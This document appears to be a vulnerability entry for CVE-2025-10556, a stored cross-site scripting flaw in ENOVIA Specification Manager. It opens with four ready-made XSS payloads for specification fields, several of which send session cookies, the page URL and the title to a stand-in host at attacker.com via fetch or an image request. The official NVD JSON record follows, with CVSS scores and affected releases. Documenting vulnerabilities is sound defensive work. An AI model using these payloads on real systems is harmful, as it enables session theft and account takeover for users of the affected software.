CVE-2025-10556

<!-- CVE-2025-10556: Stored XSS in ENOVIA Specification Manager --> <!-- The vulnerability exists in Specification Management functionality --> <!-- Attackers with low privileges can inject malicious scripts via specification fields --> <!-- Example 1: Basic script injection in specification name field --> <script>alert(document.cookie)</script> <!-- Example 2: Event handler injection in specification description --> <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> <!-- Example 3: SVG-based payload for specification attributes --> <svg onload="var img=new Image();img.src='https://attacker.com/log?data='+btoa(document.cookie);"> <!-- Example 4: Full exploitation scenario using fetch API --> <script> // Steal session and exfiltrate to attacker server var sessionData = { cookies: document.cookie, url: window.location.href, user: document.title }; fetch('https://attacker.com/exfil', { method: 'POST', body: JSON.stringify(sessionData), headers: {'Content-Type': 'application/json'} }); </script> <!-- Note: These payloads would be injected into specification management input fields --> <!-- such as specification name, description, or custom attribute values -->

{"cve": {"id": "CVE-2025-10556", "sourceIdentifier": "[email protected]", "published": "2025-10-13T08:15:39.107", "lastModified": "2025-10-21T19:57:01.243", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored Cross-site Scripting (XSS) vulnerability affecting Specification Management in ENOVIA Specification Manager from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:3ds:3dexperience_enovia:*:*:*:*:*:*:*:*", "versionStartIncluding": "r2023x", "versionEndIncluding": "r2025x", "matchCriteriaId": "A38313EB-6DE1-4460-84B4-559F14BBCC11"}]}]}], "references": [{"url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10556", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}